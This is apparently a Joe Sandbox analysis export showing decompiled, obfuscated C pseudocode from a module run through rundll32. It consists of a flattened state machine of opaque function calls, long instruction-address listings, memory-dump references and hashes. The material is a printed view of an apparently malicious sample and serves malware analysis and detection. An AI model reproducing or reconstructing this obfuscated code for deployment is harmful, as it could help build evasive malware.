                                                                                                                      								_t1314 = _t1125;
                                                                                                                      								_t1191 = 0x5dcd6da;
                                                                                                                      								goto L27;
                                                                                                                      							}
                                                                                                                      							__eflags = _t1317 - 0x2cf0ed0;
                                                                                                                      							if(_t1317 == 0x2cf0ed0) {
                                                                                                                      								_t1125 = E0069CB5B(_v340, _v248, _v348, _v356);
                                                                                                                      								goto L114;
                                                                                                                      							}
                                                                                                                      							__eflags = _t1317 - 0x3250d84;
                                                                                                                      							if(__eflags == 0) {
                                                                                                                      								_v196 = E00697BA6( &_v192, _v596, __eflags, _v492, 0x681444);
                                                                                                                      								_v204 = E00697BA6( &_v200, _v316, __eflags, _v344, 0x6814b4);
                                                                                                                      								_t1130 = E00685361(_v460, _v524,  &_v196,  &_v204);
                                                                                                                      								_t1345 = _t1345 + 0x1c;
                                                                                                                      								asm("sbb esi, esi");
                                                                                                                      								_t1317 = ( ~_t1130 & 0xfa5ce13e) + 0xccbb739;
                                                                                                                      								E0068A8B0(_v376, _v204, _v424);
                                                                                                                      								_t1125 = E0068A8B0(_v580, _v196, _v328);
                                                                                                                      								goto L109;
                                                                                                                      							}
                                                                                                                      							__eflags = _t1317 - 0x3ace1b1;
                                                                                                                      							if(_t1317 != 0x3ace1b1) {
                                                                                                                      								goto L109;
                                                                                                                      							}
                                                                                                                      							_t1125 = E0069473C();
                                                                                                                      							_t1317 = 0xc245297;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t1350 == 0) {
                                                                                                                      							_t1141 = E00694116();
                                                                                                                      							__eflags = _t1141;
                                                                                                                      							if(_t1141 == 0) {
                                                                                                                      								_t1125 = E00691FFB();
                                                                                                                      								asm("sbb esi, esi");
                                                                                                                      								_t1317 = ( ~_t1125 & 0xf7888f1a) + 0xc245297;
                                                                                                                      							} else {
                                                                                                                      								_t1125 = E00691FFB();
                                                                                                                      								asm("sbb esi, esi");
                                                                                                                      								_t1317 = ( ~_t1125 & 0x013fceb9) + 0xc7d9b3b;
                                                                                                                      							}
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t1317 == 0xc4dcd) {
                                                                                                                      							_t1125 = E00698519(_v440, _v612, _v180);
                                                                                                                      							_t1317 = 0x3d71c3c;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t1317 == 0x283259) {
                                                                                                                      							_t1125 = E006864E2(_v476, _v332, _v252,  &_v188, E00684E74(), _v232, _v620,  &_v180);
                                                                                                                      							_t1345 = _t1345 + 0x18;
                                                                                                                      							asm("sbb esi, esi");
                                                                                                                      							_t1317 = ( ~_t1125 & 0x0281667f) + 0x283259;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t1317 == 0x1b53ec1) {
                                                                                                                      							_t1125 = E006987D1();
                                                                                                                      							_v104 = _t1125;
                                                                                                                      							_t1317 = 0xfa2c753;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t1317 != 0x1f27ca8) {
                                                                                                                      							goto L109;
                                                                                                                      						}
                                                                                                                      						_t1125 = E006920BA();
                                                                                                                      						if(_t1125 == 0) {
                                                                                                                      							goto L114;
                                                                                                                      						} else {
                                                                                                                      							_t1317 = 0xa7d0a44;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					__eflags = _t1317 - 0xa7d0a44;
                                                                                                                      					if(__eflags > 0) {
                                                                                                                      						__eflags = _t1317 - 0xd7f216f;
                                                                                                                      						if(__eflags > 0) {
                                                                                                                      							__eflags = _t1317 - 0xdbd69f4;
                                                                                                                      							if(_t1317 == 0xdbd69f4) {
                                                                                                                      								_t1114 = E00699BCF();
                                                                                                                      								__eflags = _t1114;
                                                                                                                      								if(_t1114 != 0) {
                                                                                                                      									L85:
                                                                                                                      									_t1317 = 0x2cf0ed0;
                                                                                                                      									goto L1;
                                                                                                                      								}
                                                                                                                      								_t1317 = 0xc7d9b3b;
                                                                                                                      								goto L109;
                                                                                                                      							}
                                                                                                                      							__eflags = _t1317 - 0xe4333b3;
                                                                                                                      							if(_t1317 == 0xe4333b3) {
                                                                                                                      								__eflags = _t1314 - _v288;
                                                                                                                      								if(_t1314 == _v288) {
                                                                                                                      									L106:
                                                                                                                      									_t1317 = _t1191;
                                                                                                                      									goto L109;
                                                                                                                      								}
                                                                                                                      								_t1134 = E00684E74();
                                                                                                                      								_t1237 = _v480;
                                                                                                                      								_t1125 = E00688DC4(_v480, _v380, _v272, _v280, _t1134, _t1314);
                                                                                                                      								_t1345 = _t1345 + 0x10;
                                                                                                                      								__eflags = _t1125 - _v372;
                                                                                                                      								if(_t1125 == _v372) {
                                                                                                                      									_t1125 = E00686D24();
                                                                                                                      									goto L106;
                                                                                                                      								}
                                                                                                                      								_t1317 = 0x942db73;
                                                                                                                      								goto L1;
                                                                                                                      							}
                                                                                                                      							__eflags = _t1317 - 0xfa2c753;
                                                                                                                      							if(_t1317 != 0xfa2c753) {
                                                                                                                      								goto L109;
                                                                                                                      							}
                                                                                                                      							_t1125 = E0069D2CE(_t1237);
                                                                                                                      							_v172 = _t1125;
                                                                                                                      							_t1317 = 0x42dc4f0;
                                                                                                                      							goto L1;
                                                                                                                      						}
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							_t1125 = E00697D48(_t1237, __eflags);
                                                                                                                      							__eflags = _t1125;
                                                                                                                      							if(_t1125 == 0) {
                                                                                                                      								goto L114;
                                                                                                                      							}
                                                                                                                      							_t1317 = 0x4a24b69;
                                                                                                                      							goto L1;
                                                                                                                      						}
                                                                                                                      						__eflags = _t1317 - 0xb2497b0;
                                                                                                                      						if(_t1317 == 0xb2497b0) {
                                                                                                                      							_t1125 = E0068DFF3();
                                                                                                                      							_t1317 = 0x3250d84;
                                                                                                                      							goto L1;
                                                                                                                      						}
                                                                                                                      						__eflags = _t1317 - 0xc1a4fe5;
                                                                                                                      						if(_t1317 == 0xc1a4fe5) {
                                                                                                                      							_t1125 = E00697DD5();
                                                                                                                      							goto L114;
                                                                                                                      						}
                                                                                                                      						__eflags = _t1317 - 0xc245297;
                                                                                                                      						if(_t1317 == 0xc245297) {
                                                                                                                      							_t1125 = E00698BE3();
                                                                                                                      							_t1317 = 0x6397bd0;
                                                                                                                      							goto L1;
                                                                                                                      						}
                                                                                                                      						__eflags = _t1317 - 0xc7d9b3b;
                                                                                                                      						if(_t1317 != 0xc7d9b3b) {
                                                                                                                      							goto L109;
                                                                                                                      						}
                                                                                                                      						_t1125 = E006851BB();
                                                                                                                      						_t1317 = 0xb2497b0;
                                                                                                                      						goto L1;
                                                                                                                      					}
                                                                                                                      					if(__eflags == 0) {
                                                                                                                      						_t1125 = E00699EEC();
                                                                                                                      						asm("sbb esi, esi");
                                                                                                                      						_t1317 = ( ~_t1125 & 0x03bbde3e) + 0x27d9d92;
                                                                                                                      						goto L1;
                                                                                                                      					}
                                                                                                                      					__eflags = _t1317 - 0x8955e2f;
                                                                                                                      					if(__eflags > 0) {
                                                                                                                      						__eflags = _t1317 - 0x8c1c67e;
                                                                                                                      						if(_t1317 == 0x8c1c67e) {
                                                                                                                      							_t1125 = E00691EE7();
                                                                                                                      							goto L85;
                                                                                                                      						}
                                                                                                                      						__eflags = _t1317 - 0x942db73;
                                                                                                                      						if(_t1317 == 0x942db73) {
                                                                                                                      							_t1125 = E006891B0(_t1237);
                                                                                                                      							goto L114;
                                                                                                                      						}
                                                                                                                      						__eflags = _t1317 - 0xa65551a;
                                                                                                                      						if(_t1317 == 0xa65551a) {
                                                                                                                      							_t1125 = E0068B2C7(_v412, _v268,  &_v36);
                                                                                                                      							_pop(_t1237);
                                                                                                                      							__eflags = _t1125;
                                                                                                                      							if(_t1125 == 0) {
                                                                                                                      								_t1125 = _v28;
                                                                                                                      								__eflags = _t1125;
                                                                                                                      								if(_t1125 == 0) {
                                                                                                                      									_t1314 = E00690AE0(_v260, _v208);
                                                                                                                      									_t1125 = _v28;
                                                                                                                      									_pop(_t1237);
                                                                                                                      								}
                                                                                                                      								__eflags = _t1125 - 1;
                                                                                                                      								if(_t1125 == 1) {
                                                                                                                      									_t1125 = E00690AE0(_v528, _v536);
                                                                                                                      									_pop(_t1237);
                                                                                                                      									_t1314 = _t1125;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								_t1314 = _v560;
                                                                                                                      							}
                                                                                                                      							_t1191 = 0x5dcd6da;
                                                                                                                      							_t1317 = 0x53c3717;
                                                                                                                      							goto L1;
                                                                                                                      						}
                                                                                                                      						__eflags = _t1317 - 0xa74297b;
                                                                                                                      						if(_t1317 != 0xa74297b) {
                                                                                                                      							goto L109;
                                                                                                                      						}
                                                                                                                      						_t1125 = E006875F1();
                                                                                                                      						_v100 = _t1125;
                                                                                                                      						_t1317 = 0x1b53ec1;
                                                                                                                      						goto L1;
                                                                                                                      					}
                                                                                                                      					if(__eflags == 0) {
                                                                                                                      						_t1125 = E0069E1D4();
                                                                                                                      						__eflags = _t1125;
                                                                                                                      						if(_t1125 == 0) {
                                                                                                                      							goto L114;
                                                                                                                      						}
                                                                                                                      						_t1317 = 0x1f27ca8;
                                                                                                                      						goto L1;
                                                                                                                      					}
                                                                                                                      					__eflags = _t1317 - 0x6eeee91;
                                                                                                                      					if(_t1317 == 0x6eeee91) {
                                                                                                                      						_t1237 = _v276;
                                                                                                                      						_t1125 = E00682251(_v276,  &_v188,  &_v172, _v420, _v428);
                                                                                                                      						_t1345 = _t1345 + 0xc;
                                                                                                                      						asm("sbb esi, esi");
                                                                                                                      						_t1317 = ( ~_t1125 & 0xfc51161d) + 0x3d71c3c;
                                                                                                                      						goto L1;
                                                                                                                      					}
                                                                                                                      					__eflags = _t1317 - 0x7289877;
                                                                                                                      					if(_t1317 == 0x7289877) {
                                                                                                                      						E0069E1D4();
                                                                                                                      						_t1191 = 0x3fc5519;
                                                                                                                      						_t1125 = E00690AE0(_v584, _v436);
                                                                                                                      						_t1314 = _t1125;
                                                                                                                      						goto L34;
                                                                                                                      					}
                                                                                                                      					__eflags = _t1317 - 0x77c68ce;
                                                                                                                      					if(_t1317 == 0x77c68ce) {
                                                                                                                      						_t1125 = E00695CC4();
                                                                                                                      						_t1317 = 0x8c1c67e;
                                                                                                                      						goto L1;
                                                                                                                      					}
                                                                                                                      					__eflags = _t1317 - 0x8690ed6;
                                                                                                                      					if(_t1317 != 0x8690ed6) {
                                                                                                                      						goto L109;
                                                                                                                      					}
                                                                                                                      					_t1125 = E0069044F();
                                                                                                                      					__eflags = _t1125;
                                                                                                                      					if(_t1125 == 0) {
                                                                                                                      						goto L114;
                                                                                                                      					}
                                                                                                                      					_t1317 = 0x8955e2f;
                                                                                                                      					goto L1;
                                                                                                                      					L109:
                                                                                                                      					__eflags = _t1317 - 0xccbb739;
                                                                                                                      				} while (_t1317 != 0xccbb739);
                                                                                                                      				goto L114;
                                                                                                                      			}
                                                                                                                      0x00692aa5
                                                                                                                      0x00692ab8
                                                                                                                      0x00692abb
                                                                                                                      0x00692ac2
                                                                                                                      0x00692aca
                                                                                                                      0x00692ad5
                                                                                                                      0x00692add
                                                                                                                      0x00692ae2
                                                                                                                      0x00692aea
                                                                                                                      0x00692af2
                                                                                                                      0x00692b05
                                                                                                                      0x00692b0c
                                                                                                                      0x00692b17
                                                                                                                      0x00692b1f
                                                                                                                      0x00692b2a
                                                                                                                      0x00692b35
                                                                                                                      0x00692b3d
                                                                                                                      0x00692b48
                                                                                                                      0x00692b53
                                                                                                                      0x00692b5a
                                                                                                                      0x00692b65
                                                                                                                      0x00692b70
                                                                                                                      0x00692b83
                                                                                                                      0x00692b8a
                                                                                                                      0x00692ba0
                                                                                                                      0x00692ba7
                                                                                                                      0x00692bb2
                                                                                                                      0x00692bba
                                                                                                                      0x00692bc2
                                                                                                                      0x00692bca
                                                                                                                      0x00692bcf
                                                                                                                      0x00692bd7
                                                                                                                      0x00692bea
                                                                                                                      0x00692beb
                                                                                                                      0x00692bfa
                                                                                                                      0x00692c01
                                                                                                                      0x00692c08
                                                                                                                      0x00692c13
                                                                                                                      0x00692c1e
                                                                                                                      0x00692c26
                                                                                                                      0x00692c31
                                                                                                                      0x00692c3c
                                                                                                                      0x00692c47
                                                                                                                      0x00692c58
                                                                                                                      0x00692c5f
                                                                                                                      0x00692c6c
                                                                                                                      0x00692c74
                                                                                                                      0x00692c7c
                                                                                                                      0x00692c86
                                                                                                                      0x00692c8b
                                                                                                                      0x00692c91
                                                                                                                      0x00692c99
                                                                                                                      0x00692ca4
                                                                                                                      0x00692caf
                                                                                                                      0x00692cba
                                                                                                                      0x00692ccd
                                                                                                                      0x00692cce
                                                                                                                      0x00692cd5
                                                                                                                      0x00692ce0
                                                                                                                      0x00692cf3
                                                                                                                      0x00692cfa
                                                                                                                      0x00692d05
                                                                                                                      0x00692d10
                                                                                                                      0x00692d1e
                                                                                                                      0x00692d22
                                                                                                                      0x00692d2a
                                                                                                                      0x00692d2f
                                                                                                                      0x00692d37
                                                                                                                      0x00692d42
                                                                                                                      0x00692d4a
                                                                                                                      0x00692d55
                                                                                                                      0x00692d5d
                                                                                                                      0x00692d62
                                                                                                                      0x00692d67
                                                                                                                      0x00692d6f
                                                                                                                      0x00692d77
                                                                                                                      0x00692d82
                                                                                                                      0x00692d8d
                                                                                                                      0x00692d98
                                                                                                                      0x00692da3
                                                                                                                      0x00692dab
                                                                                                                      0x00692db3
                                                                                                                      0x00692dbc
                                                                                                                      0x00692dc0
                                                                                                                      0x00692dc8
                                                                                                                      0x00692dd3
                                                                                                                      0x00692dde
                                                                                                                      0x00692de9
                                                                                                                      0x00692df4
                                                                                                                      0x00692dff
                                                                                                                      0x00692e0a
                                                                                                                      0x00692e12
                                                                                                                      0x00692e1c
                                                                                                                      0x00692e20
                                                                                                                      0x00692e28
                                                                                                                      0x00692e30
                                                                                                                      0x00692e3b
                                                                                                                      0x00692e46
                                                                                                                      0x00692e51
                                                                                                                      0x00692e58
                                                                                                                      0x00692e63
                                                                                                                      0x00692e6e
                                                                                                                      0x00692e79
                                                                                                                      0x00692e84
                                                                                                                      0x00692e8f
                                                                                                                      0x00692e9a
                                                                                                                      0x00692ea5
                                                                                                                      0x00692eb0
                                                                                                                      0x00692ebb
                                                                                                                      0x00692ec6
                                                                                                                      0x00692ed1
                                                                                                                      0x00692edc
                                                                                                                      0x00692eef
                                                                                                                      0x00692f02
                                                                                                                      0x00692f05
                                                                                                                      0x00692f0c
                                                                                                                      0x00692f17
                                                                                                                      0x00692f22
                                                                                                                      0x00692f2d
                                                                                                                      0x00692f38
                                                                                                                      0x00692f4e
                                                                                                                      0x00692f55
                                                                                                                      0x00692f60
                                                                                                                      0x00692f6b
                                                                                                                      0x00692f76
                                                                                                                      0x00692f81
                                                                                                                      0x00692f8c
                                                                                                                      0x00692f97
                                                                                                                      0x00692fa9
                                                                                                                      0x00692fae
                                                                                                                      0x00692fb7
                                                                                                                      0x00692fc2
                                                                                                                      0x00692fcd
                                                                                                                      0x00692fd8
                                                                                                                      0x00692fe3
                                                                                                                      0x00692fee
                                                                                                                      0x00692ff9
                                                                                                                      0x00693001
                                                                                                                      0x00693009
                                                                                                                      0x00693011
                                                                                                                      0x0069301c
                                                                                                                      0x00693027
                                                                                                                      0x00693032
                                                                                                                      0x0069303d
                                                                                                                      0x0069304f
                                                                                                                      0x00693054
                                                                                                                      0x0069305d
                                                                                                                      0x00693068
                                                                                                                      0x00693070
                                                                                                                      0x00693078
                                                                                                                      0x00693080
                                                                                                                      0x00693088
                                                                                                                      0x00693090
                                                                                                                      0x00693098
                                                                                                                      0x006930a1
                                                                                                                      0x006930a4
                                                                                                                      0x006930a8
                                                                                                                      0x006930b0
                                                                                                                      0x006930b8
                                                                                                                      0x006930c3
                                                                                                                      0x006930ce
                                                                                                                      0x006930d9
                                                                                                                      0x006930e4
                                                                                                                      0x006930ef
                                                                                                                      0x006930fa
                                                                                                                      0x00693102
                                                                                                                      0x0069310a
                                                                                                                      0x00693115
                                                                                                                      0x00693120
                                                                                                                      0x0069312b
                                                                                                                      0x00693136
                                                                                                                      0x00693141
                                                                                                                      0x0069314c
                                                                                                                      0x00693157
                                                                                                                      0x00693162
                                                                                                                      0x0069316d
                                                                                                                      0x00693178
                                                                                                                      0x00693185
                                                                                                                      0x0069318d
                                                                                                                      0x00693198
                                                                                                                      0x006931a0
                                                                                                                      0x006931a5
                                                                                                                      0x006931aa
                                                                                                                      0x006931af
                                                                                                                      0x006931b7
                                                                                                                      0x006931c7
                                                                                                                      0x006931cb
                                                                                                                      0x006931d0
                                                                                                                      0x006931d5
                                                                                                                      0x006931dd
                                                                                                                      0x006931e8
                                                                                                                      0x006931f3
                                                                                                                      0x006931fb
                                                                                                                      0x00693206
                                                                                                                      0x00693211
                                                                                                                      0x0069321c
                                                                                                                      0x00693227
                                                                                                                      0x0069323c
                                                                                                                      0x0069323f
                                                                                                                      0x00693251
                                                                                                                      0x00693258
                                                                                                                      0x00693263
                                                                                                                      0x0069326e
                                                                                                                      0x00693276
                                                                                                                      0x00693281
                                                                                                                      0x00693289
                                                                                                                      0x00693291
                                                                                                                      0x00693296
                                                                                                                      0x0069329e
                                                                                                                      0x006932a6
                                                                                                                      0x006932b1
                                                                                                                      0x006932b9
                                                                                                                      0x006932c4
                                                                                                                      0x006932cf
                                                                                                                      0x006932d7
                                                                                                                      0x006932df
                                                                                                                      0x006932e7
                                                                                                                      0x006937b1
                                                                                                                      0x00693881
                                                                                                                      0x00693887
                                                                                                                      0x00000000
                                                                                                                      0x00693887
                                                                                                                      0x006937bd
                                                                                                                      0x00693850
                                                                                                                      0x00693855
                                                                                                                      0x0069385c
                                                                                                                      0x00693864
                                                                                                                      0x00000000
                                                                                                                      0x00693864
                                                                                                                      0x006937c5
                                                                                                                      0x006937f6
                                                                                                                      0x006937fb
                                                                                                                      0x00693802
                                                                                                                      0x00000000
                                                                                                                      0x00693802
                                                                                                                      0x006937cd
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x006937de
                                                                                                                      0x006937e5
                                                                                                                      0x00000000
                                                                                                                      0x006937eb
                                                                                                                      0x006937eb
                                                                                                                      0x00000000
                                                                                                                      0x006937eb
                                                                                                                      0x006937e5
                                                                                                                      0x00693c13
                                                                                                                      0x00693c19
                                                                                                                      0x00693e40
                                                                                                                      0x00693e46
                                                                                                                      0x00693edd
                                                                                                                      0x00693ee3
                                                                                                                      0x00693f9b
                                                                                                                      0x00693fa0
                                                                                                                      0x00693fa2
                                                                                                                      0x00693e13
                                                                                                                      0x00693e13
                                                                                                                      0x00000000
                                                                                                                      0x00693e13
                                                                                                                      0x00693fa8
                                                                                                                      0x00000000
                                                                                                                      0x00693fa8
                                                                                                                      0x00693ee9
                                                                                                                      0x00693eef
                                                                                                                      0x00693f21
                                                                                                                      0x00693f28
                                                                                                                      0x00693f89
                                                                                                                      0x00693f89
                                                                                                                      0x00000000
                                                                                                                      0x00693f89
                                                                                                                      0x00693f38
                                                                                                                      0x00693f54
                                                                                                                      0x00693f5b
                                                                                                                      0x00693f60
                                                                                                                      0x00693f63
                                                                                                                      0x00693f6a
                                                                                                                      0x00693f84
                                                                                                                      0x00000000
                                                                                                                      0x00693f84
                                                                                                                      0x00693f6c
                                                                                                                      0x00000000
                                                                                                                      0x00693f6c
                                                                                                                      0x00693ef1
                                                                                                                      0x00693ef7
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00693f0b
                                                                                                                      0x00693f10
                                                                                                                      0x00693f17
                                                                                                                      0x00000000
                                                                                                                      0x00693f17
                                                                                                                      0x00693e4c
                                                                                                                      0x00693ec6
                                                                                                                      0x00693ecb
                                                                                                                      0x00693ecd
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00693ed3
                                                                                                                      0x00000000
                                                                                                                      0x00693ed3
                                                                                                                      0x00693e4e
                                                                                                                      0x00693e54
                                                                                                                      0x00693ea9
                                                                                                                      0x00693eae
                                                                                                                      0x00000000
                                                                                                                      0x00693eae
                                                                                                                      0x00693e56
                                                                                                                      0x00693e5c
                                                                                                                      0x00694004
                                                                                                                      0x00000000
                                                                                                                      0x00694004
                                                                                                                      0x00693e62
                                                                                                                      0x00693e68
                                                                                                                      0x00693e93
                                                                                                                      0x00693e98
                                                                                                                      0x00000000
                                                                                                                      0x00693e98
                                                                                                                      0x00693e6a
                                                                                                                      0x00693e70
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00693e7d
                                                                                                                      0x00693e82
                                                                                                                      0x00000000
                                                                                                                      0x00693e82
                                                                                                                      0x00693c1f
                                                                                                                      0x00693e24
                                                                                                                      0x00693e2d
                                                                                                                      0x00693e35
                                                                                                                      0x00000000
                                                                                                                      0x00693e35
                                                                                                                      0x00693c25
                                                                                                                      0x00693c2b
                                                                                                                      0x00693d2d
                                                                                                                      0x00693d33
                                                                                                                      0x00693e0e
                                                                                                                      0x00000000
                                                                                                                      0x00693e0e
                                                                                                                      0x00693d39
                                                                                                                      0x00693d3f
                                                                                                                      0x00693fef
                                                                                                                      0x00000000
                                                                                                                      0x00693fef
                                                                                                                      0x00693d45
                                                                                                                      0x00693d4b
                                                                                                                      0x00693d8c
                                                                                                                      0x00693d91
                                                                                                                      0x00693d92
                                                                                                                      0x00693d94
                                                                                                                      0x00693d9c
                                                                                                                      0x00693da3
                                                                                                                      0x00693da5
                                                                                                                      0x00693dc3
                                                                                                                      0x00693dc5
                                                                                                                      0x00693dcc
                                                                                                                      0x00693dcc
                                                                                                                      0x00693dcd
                                                                                                                      0x00693dd0
                                                                                                                      0x00693deb
                                                                                                                      0x00693df1
                                                                                                                      0x00693df2
                                                                                                                      0x00693df2
                                                                                                                      0x00693d96
                                                                                                                      0x00693d96
                                                                                                                      0x00693d96
                                                                                                                      0x00693df4
                                                                                                                      0x00693df6
                                                                                                                      0x00000000
                                                                                                                      0x00693df6
                                                                                                                      0x00693d4d
                                                                                                                      0x00693d53
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00693d60
                                                                                                                      0x00693d65
                                                                                                                      0x00693d6c
                                                                                                                      0x00000000
                                                                                                                      0x00693d6c
                                                                                                                      0x00693c31
                                                                                                                      0x00693d16
                                                                                                                      0x00693d1b
                                                                                                                      0x00693d1d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00693d23
                                                                                                                      0x00000000
                                                                                                                      0x00693d23
                                                                                                                      0x00693c37
                                                                                                                      0x00693c3d
                                                                                                                      0x00693ce0
                                                                                                                      0x00693cef
                                                                                                                      0x00693cf4
                                                                                                                      0x00693cfb
                                                                                                                      0x00693d03
                                                                                                                      0x00000000
                                                                                                                      0x00693d03
                                                                                                                      0x00693c43
                                                                                                                      0x00693c49
                                                                                                                      0x00693c9e
                                                                                                                      0x00693caa
                                                                                                                      0x00693cbe
                                                                                                                      0x00693cc4
                                                                                                                      0x00000000
                                                                                                                      0x00693cc4
                                                                                                                      0x00693c4b
                                                                                                                      0x00693c51
                                                                                                                      0x00693c81
                                                                                                                      0x00693c86
                                                                                                                      0x00000000
                                                                                                                      0x00693c86
                                                                                                                      0x00693c53
                                                                                                                      0x00693c59
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00693c63
                                                                                                                      0x00693c68
                                                                                                                      0x00693c6a
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00693c70
                                                                                                                      0x00000000
                                                                                                                      0x00693fad
                                                                                                                      0x00693fad
                                                                                                                      0x00693fad
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )If$D}$D}$G$TRr$Y2($\Q$c{v$n)+$rZM*${)t${)t$`$u#$xy
                                                                                                                      • API String ID: 0-3738653114
                                                                                                                      • Opcode ID: c69a520c86b00743ba0ac5bf14b34c97b70546c22a57a5e83be229c867c8b4e4
                                                                                                                      • Instruction ID: 156daf2e10a5a8ad2841a3e61af398f53d53dcc0c10e77747f303e20ac56a2ee
                                                                                                                      • Opcode Fuzzy Hash: c69a520c86b00743ba0ac5bf14b34c97b70546c22a57a5e83be229c867c8b4e4
                                                                                                                      • Instruction Fuzzy Hash: 27C224715083808BD7B8DF25C58ABCFBBE1BB85314F10891DE5DA9A660DBB08949CF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E00682BD9(intOrPtr __ecx) {
                                                                                                                      				char _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				char _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				intOrPtr _v56;
                                                                                                                      				char* _v60;
                                                                                                                      				intOrPtr _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				intOrPtr _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				char _v80;
                                                                                                                      				intOrPtr _v84;
                                                                                                                      				char _v88;
                                                                                                                      				char _v92;
                                                                                                                      				char _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				signed int _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				signed int _v180;
                                                                                                                      				signed int _v184;
                                                                                                                      				unsigned int _v188;
                                                                                                                      				signed int _v192;
                                                                                                                      				signed int _v196;
                                                                                                                      				signed int _v200;
                                                                                                                      				signed int _v204;
                                                                                                                      				signed int _v208;
                                                                                                                      				signed int _v212;
                                                                                                                      				signed int _v216;
                                                                                                                      				signed int _v220;
                                                                                                                      				signed int _v224;
                                                                                                                      				signed int _v228;
                                                                                                                      				signed int _v232;
                                                                                                                      				signed int _v236;
                                                                                                                      				signed int _v240;
                                                                                                                      				signed int _v244;
                                                                                                                      				signed int _v248;
                                                                                                                      				signed int _v252;
                                                                                                                      				signed int _v256;
                                                                                                                      				signed int _v260;
                                                                                                                      				signed int _v264;
                                                                                                                      				signed int _v268;
                                                                                                                      				signed int _v272;
                                                                                                                      				signed int _v276;
                                                                                                                      				signed int _v280;
                                                                                                                      				signed int _v284;
                                                                                                                      				signed int _v288;
                                                                                                                      				signed int _v292;
                                                                                                                      				signed int _v296;
                                                                                                                      				signed int _v300;
                                                                                                                      				signed int _v304;
                                                                                                                      				signed int _v308;
                                                                                                                      				signed int _v312;
                                                                                                                      				signed int _v316;
                                                                                                                      				signed int _v320;
                                                                                                                      				signed int _v324;
                                                                                                                      				signed int _v328;
                                                                                                                      				signed int _v332;
                                                                                                                      				signed int _v336;
                                                                                                                      				signed int _v340;
                                                                                                                      				signed int _v344;
                                                                                                                      				signed int _v348;
                                                                                                                      				signed int _v352;
                                                                                                                      				signed int _v356;
                                                                                                                      				signed int _v360;
                                                                                                                      				signed int _v364;
                                                                                                                      				signed int _v368;
                                                                                                                      				signed int _v372;
                                                                                                                      				signed int _v376;
                                                                                                                      				signed int _v380;
                                                                                                                      				signed int _v384;
                                                                                                                      				signed int _v388;
                                                                                                                      				signed int _v392;
                                                                                                                      				signed int _v396;
                                                                                                                      				void* _t716;
                                                                                                                      				void* _t717;
                                                                                                                      				void* _t718;
                                                                                                                      				intOrPtr _t730;
                                                                                                                      				intOrPtr _t732;
                                                                                                                      				void* _t733;
                                                                                                                      				signed int _t735;
                                                                                                                      				void* _t741;
                                                                                                                      				intOrPtr _t746;
                                                                                                                      				intOrPtr _t752;
                                                                                                                      				intOrPtr _t754;
                                                                                                                      				intOrPtr _t755;
                                                                                                                      				void* _t757;
                                                                                                                      				void* _t759;
                                                                                                                      				intOrPtr _t760;
                                                                                                                      				void* _t766;
                                                                                                                      				signed int _t772;
                                                                                                                      				signed int _t773;
                                                                                                                      				signed int _t774;
                                                                                                                      				signed int _t775;
                                                                                                                      				signed int _t776;
                                                                                                                      				signed int _t777;
                                                                                                                      				signed int _t778;
                                                                                                                      				signed int _t779;
                                                                                                                      				signed int _t780;
                                                                                                                      				signed int _t781;
                                                                                                                      				signed int _t782;
                                                                                                                      				void* _t783;
                                                                                                                      				intOrPtr _t792;
                                                                                                                      				void* _t807;
                                                                                                                      				void* _t812;
                                                                                                                      				void* _t842;
                                                                                                                      				intOrPtr _t848;
                                                                                                                      				void* _t864;
                                                                                                                      				intOrPtr _t866;
                                                                                                                      				signed int _t867;
                                                                                                                      				void* _t868;
                                                                                                                      				void* _t873;
                                                                                                                      				signed int* _t875;
                                                                                                                      				void* _t878;
                                                                                                                      
                                                                                                                      				_t875 =  &_v396;
                                                                                                                      				_v56 = 0xa0cd19;
                                                                                                                      				_t873 = 0;
                                                                                                                      				_v84 = __ecx;
